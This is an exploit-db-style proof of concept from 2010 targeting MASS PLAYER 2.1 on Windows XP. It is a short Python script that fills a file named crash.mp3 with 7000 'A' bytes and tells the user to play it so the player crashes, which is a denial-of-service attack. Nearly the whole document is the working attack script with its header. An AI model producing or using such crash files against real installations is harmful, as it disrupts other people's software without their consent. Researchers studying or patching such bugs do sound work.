#Exploit Title :MASS PLAYER 2.1 Denial of service vulnerability #Software : MASS PLAYER 2.1 #Software link :http://sourceforge.net/projects/massmusicplayer/ #Autor : Sweet #Email : charif38@hotmail.fr #Date : 19/10/2010 #Software version : 2.1 #Tested on : WinXP sp3 ENG #!/usr/bin/python #thx to Milw0rm.com , JF - Hamst0r - Keystroke) R.I.P , inj3ct0r.com , exploit-db.com, packetstormsecurity.org, http://ha.ckers.org #et 1,2,3 viva L'Algerie outfile="crash.mp3" junk="\x41" * 7000 FILE=open(outfile, "w") FILE.write(junk) FILE.close() print ''' File created succesufully , open it with MASS player and press the Play button '''